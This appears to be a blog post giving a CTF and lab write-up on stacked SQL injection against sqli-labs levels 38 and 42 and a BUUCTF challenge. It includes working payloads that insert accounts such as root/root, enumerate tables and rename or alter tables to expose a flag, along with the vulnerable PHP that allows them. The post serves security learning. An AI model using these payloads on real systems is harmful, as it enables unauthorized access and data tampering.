Stack injection of SQL injection

Category: Tag:

I did a web question on BUUCTF, which involves stack injection, so let’s learn it.

In SQL statements, the end of the statement always ends with `;`, but if we add another SQL statement after `;`, will the two statements be executed together? This is the cause of stack injection

The simplest statement `select * from users; DELETE FROM test`

Query the user table first, and then delete the user table from the test database.

Let’s conduct actual combat

Shooting range: sql-libs38

First judge the closing point, which is’

Reconstruct the payload:?id=1′ order by 4 %23

Determine the number of columns to be 3 columns

Level 38 can be understood as a blind note, the right or wrong of the second sentence will not be echoed to us

Ok, let’s construct the payload first: `?id=-1′; insert into users(id,username,password) values(88,’aaa’,’bbb’)%23`

But the page is not displayed, let’s go to the database to check

The last line, username: aaa, password: bbb has been successfully inserted into the database

If we add the account and password of the administrator, then what is the result?

This level is not obvious, let’s try level 42

sql-libs-42

Because aaa has been inserted just now, now we directly construct the payload login

①username:ʻaaa’;insert into users(id,username,password) values(60,’root’,’root’)#`
password:`bbb`

I checked the database and found that the addition was not successful, but the statement was correct. Consider filtering the username or other protective measures.

②username:ʻaaa`
password:`bbb’;insert into users(id,username,password) values(60,’root’,’root’)#`

Try to stack the password again

Successful landing

View database

Inserted successfully

Go and look at the source code of level 42

“`
$username = mysqli_real_escape_string($con1, $_POST[“login_user”]);
$password = $_POST[“login_password”];
“`
The username was escaped, but the password was submitted directly in post, which caused stack injection.

Another example

[ 2019] Random injection
Insert picture description here
First judge whether there is an injection point, try 1′

Injection point found

Then determine the number of columns

222222

Use 1’union select 1, database(); #An error occurred

Characters such as select are filtered, normal injection cannot be used, and error injection cannot be used!

Look at the master’s WP try to use stack injection.

We first construct the payload: 1′;show database; #

View database

Construct payload1′ again; show tables; #View several tables

Only two tables
From the two tables, we then query the column
Construct payload: 0′; show columns from words;#

Did not find the flag we wanted

Then construct the payload:

0′;show columns from `1919810931114514`;#
I forgot to add single quotes to the characters before, but I tried n times without success! It was only after adding characters that I realized that my ignorance was terrible and wasted a lot of time! ! !

Find the flag column, the next step is how to make him echo it

In the above picture, we know that regular matching filters many characters, but not alert and rename.

① Change the words table to word1 first

②Rename the 1919810931114514 table to be modified to word

③ Modify the flag field to id

Construct the payload:

0';RENAME TABLE `words` TO `words1`;RENAME TABLE
 `1919810931114514` TO `words`;ALTER TABLE `words` CHANGE `flag`
 `id` VARCHAR(100) CHARACTER SET utf8 COLLATE utf8_general_ci
 NOT NULL;show columns from words;#

Should succeed

emmmmm, use 1′;show tables;#

Modified successfully

Access 0’or ‘1’=’1

Get flag

 

Reviews

There are no reviews yet.

Be the first to review “Stack injection of SQL injection”

Your email address will not be published. Required fields are marked *